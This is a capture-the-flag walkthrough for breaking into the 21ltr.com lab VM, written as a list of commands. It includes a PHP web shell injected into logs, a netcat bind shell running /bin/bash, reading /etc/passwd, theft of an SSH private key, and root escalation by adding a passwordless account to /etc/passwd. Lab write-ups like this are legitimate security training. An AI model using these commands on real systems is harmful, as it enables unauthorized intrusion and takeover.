After a long break, the #HackOnTuesday episodes are back! In today’s episode we will hack the 21ltr.com CTF VM by first identifying the vulnerable trust relationship between the main VM and a backup system used by the VM, and then impersonating the backup system in order to exploit that trust relationship and compromise the 21ltr.com VM.

Tools, Scripts, and Exploits

Steps

  • Identify all the hosts in the target network
    • nmap -sn 192.168.2.0/24
  • Identify the services listening on the server.
    • nmap -v -Pn -sT 192.168.2.120 -p-
    • nmap -sV 192.168.2.120 -p 21,22,80
  • Look for any vulnerable Web application
    • Open Firefox and go to http://192.168.2.120/
    • Open a new terminal and run dirbuster
      • cd 21ltr
      • clear
      • dirbuster   # Use the wordlist at /usr/share/wordlists/directory-list-2.3-medium.txt
    • View source code on Firefox.
      • Hidden in the HTML source code there is a username and password!!
  • Test whether the found credentials can be used to connect to either SSH or FTP.
    • ssh logs@192.168.2.120   # type the password
      • Login failed
    • ftp 192.168.2.120 # type username (e.g. logs) and password
      • Login successful
  • Look for any interesting file in the FTP server.
    • ls
    • lcd /root/21ltr
    • get backup_log.php
    • quit
    • cat backup_log.php
      • Take note of the IP mentioned in the script.
  • Find the correct path to backup_log.php
    • Go to http://192.168.2.120/backup_log.php   # Page not found!
    • Go to http://192.168.2.120/logs/backup_log.php   # Bingo!
  • Change your IP to the one found in the backup_log.php script and check whether there is any way to inject something into the logs.
    • ifconfig eth0 down
    • ifconfig eth0 192.168.2.240/24
    • ifconfig eth0 up
    • wireshark& # set the filter to ip.addr == 192.168.2.120
      • Every 5-10 minutes the target attempts a connection to our spoofed address on port 10000.
  • Learn more about the connection attempt on port 10000
    • nc -lvp 10000 > out.bin
    • file out.bin
    • mv out.bin out.gz
    • gunzip out.gz
    • file out
    • tar xvf out
    • ls -lFh
    • cd media/backup
    • tar xzvf pxelinux.cfg.tar.gz
  • The pxelinux.cfg.tar.gz archive does not seem to contain anything interesting. However, after re-running nmap, I saw a new open port: port 10001. This port seemed to be open only for a short time right after the backup archive is sent to us.
  • Analyze the service on port 10001
    • nc -nlvp 10000 > data.tar.gz && nc -nv 192.168.2.120 10001   # receive the next push, then connect to 10001 while it is still open
    • type ? or help to see what the service accepts
    • Go back to Firefox and refresh. Bingo! What we typed ends up in the logs, so we have a way to inject into them.
  • Inject a PHP shell in the logs
    • type <?php echo exec($_GET["cmd"]);?>   # exec() returns only the last line of output, which is enough for the single-line checks below
    • Go to http://192.168.2.120/logs/backup_log.php?cmd=whereis nc
    • Go to http://192.168.2.120/logs/backup_log.php?cmd=whereis bash
    • Go to http://192.168.2.120/logs/backup_log.php?cmd=nc -nlvp 4444 -e /bin/bash   # bind shell: the target now listens on port 4444
    • Open a new terminal and type nc -nv 192.168.2.120 4444
  • Look for sensitive data
    • cat /etc/passwd
    • ls /home/jgreen
    • ls /home/hbeale
    • ls /tmp
    • cd /tmp
    • tar tvf backup.tar.gz # most likely the file we got from the server
    • ls /media
    • ls /media/backup # same file
    • cd /media/USB_1
    • ls -lFh
    • cd Stuff
    • ls -lFh
    • cd Keys
    • ls -lFh
    • cat id_rsa   # A private key, but we don't know whose it is: maybe root, maybe jgreen, maybe hbeale.
  • Use the private key to connect to the system.
    • Copy private key to a local file called key.
    • chmod 600 key
    • ssh -i key root@192.168.2.120   # Login failed
    • ssh -i key hbeale@192.168.2.120   # Login successful
  • Escalate to root
    • List the allowed (and forbidden) commands for the invoking user.
      • sudo -l
    • Add an account with root privileges
      • sudo /usr/bin/cat >> /etc/passwd   # type gianni::0:0::/root:/bin/bash, press Enter, then CTRL+C
      • The empty second field means no password is required. Note that the >> redirection is opened by hbeale's shell, not by the root-owned cat, so this only works when the invoking user can already write to /etc/passwd; sudo cat on its own does not grant the write.
    • su gianni
  • Game Over!
